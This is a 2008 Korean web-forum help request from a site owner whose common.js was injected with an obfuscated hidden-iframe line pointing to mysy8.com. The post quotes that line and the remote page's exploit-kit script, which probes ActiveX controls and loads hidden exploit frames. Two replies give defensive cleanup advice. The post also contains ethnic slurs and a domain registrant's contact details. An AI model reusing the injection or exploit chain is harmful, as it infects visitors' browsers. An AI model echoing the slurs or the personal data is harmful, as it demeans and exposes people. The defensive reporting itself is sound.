또 악성스크립트가 심어지네요..확인한결과 중국넘.. > 그누4 질문답변

매뉴얼 FAQ
그누보드5
데모
자료실
  • 다운로드
  • 매뉴얼
  • Q&A
    • 창작마당
  • 팁자료실
  • 스킨
  • 빌더
  • 테마
  • 플러그인
  • 사용후기
    • 영카트5
    데모
    자료실
    창작마당
    정기결제
    데모
    자료실
    Q & A
    궁금한 게 있으신가요? 지금 질문해보세요!
    솔루션
    프로그래밍
    서버
    사이트운영
    컨텐츠몰
    나의 재능을 팔아보세요!
    부가서비스
    국내최저! 신용카드 결제수수료 2.85%
    제작의뢰
    커뮤니티
    커뮤니티
    소모임
    스터디
    AI 🌟
    강좌
    기타

    그누4 질문답변

    그누보드4 관련 질문은 QA 로 이전됩니다. QA 그누보드4 바로가기
    기존 게시물은 열람만 가능합니다.

    또 악성스크립트가 심어지네요..확인한결과 중국넘.. 정보

    또 악성스크립트가 심어지네요..확인한결과 중국넘..

    본문

    mysy8.com/1.htm
    위사이트에서 저희사이트에 ./js/common.js 하단에..
    document.write("<iframe width='0' height='100' src='http://%6D%79%73%79%38%2E%63%6F%6D/1.htm'></iframe>");
    위와같은 악성코드를 심어놨더군요..
    확인해본결과...mysy8.com/1.htm 여기인데..
    소스를 보니..
    -------------------------------------------------------------
    <script>
    document.write("<iframe width=100 height=0 src=flash.htm></iframe>");
    window.status="";
    window.onerror=function(){return true;}
    if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
    document.write("<iframe width=20 height=0 src=14.htm></iframe>");
    document.write("<iframe width=20 height=0 src=office.htm></iframe>");
    try{var b;
    var mz=new ActiveXObject("NCTAudioFile2.AudioFile2.2");}
    catch(b){};                     
    finally{if(b!="[object Error]"){document.write("<iframe width=100 height=0 src=nct.htm></iframe>");}}
    function test()
    {
    rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
    try
    {
    Like = new ActiveXObject(rrooxx);
    }catch(error){return;}
    vvvvv = Like.PlayerProperty("PRODUCTVERSION");
    if(vvvvv<="6.0.14.552")
    document.write("<iframe width=100 height=0 src=re10.htm></iframe>");
    else
    document.write("<iframe width=100 height=0 src=re11.htm></iframe>");
    }
    test();
    </script>
    <script src="http://s80.cnzz.com/stat.php?id=1082211&web_id=1082211&show=pic" language="JavaScript" charset="gb2312"></script>
    ----------------------------------------------------------------------
    위와같이 되어있더군요..정보를 빼가는 트로이목마 인것 같은데..
    아시는분 답변부탁드립니다...그리고 대처방법이 없;는지?..
    사이트가 사람이 많은지라...조심스러워 지는군요..^^..
    좋은하루되세요.
    ----------------------------------------------------------------------

    참고로 도메인정보를 확인해보니..
    Dongqixiang *** 개인정보보호를 위한 이메일주소 노출방지 *** +86.02481088777
    DongQixiang
    Beijing City
    ShenYang,Liaoning,CHINA 110000
    이렇게 나오네요..짱깨이 말좀 하면..그냥 퍼붓고 싶은데..말이 안통하는지라..ㅋ....
    -------------------------------------------------------------------------------------

    댓글 전체

    letsgolee 자기소개 아이디로 검색 회원게시물 08.10.13 11:12:20
    코드가 변경된다는 것은 이미 문제의 파일이 서버상에 존재한다는 말입니다. data폴더 안쪽을 확인해 보시고 의심가는 것이 없다면 호스팅 사이트에 문의해 보세요.
    June44 홈페이지 자기소개 아이디로 검색 회원게시물 08.10.13 13:24:20
    쉘상에서 확인 해 보시면 알수 업는 폴더명이 있을 겁니다..
    그부분이 서버를 제어하는 소스가 존재 하는 부분이고, *.c 등과 같이 쉘상에서 명령을 실행해서
    설치를 진행하는 프로그램이 있을 겁니다...
    자세한건 로그를 확인하셔서 IP를 차단 하시고, 해당 경로의 보안을 강화 해야 합니다
    전체 71 |RSS
    그누4 질문답변 내용 검색

    회원로그인

    (주)에스아이알소프트 / 대표:홍석명 / (06211) 서울특별시 강남구 역삼동 707-34 한신인터밸리24 서관 1402호 / E-Mail: admin@sir.kr
    사업자등록번호: 217-81-36347 / 통신판매업신고번호:2014-서울강남-02098호 / 개인정보보호책임자:김민섭(minsup@sir.kr)
    © SIRSOFT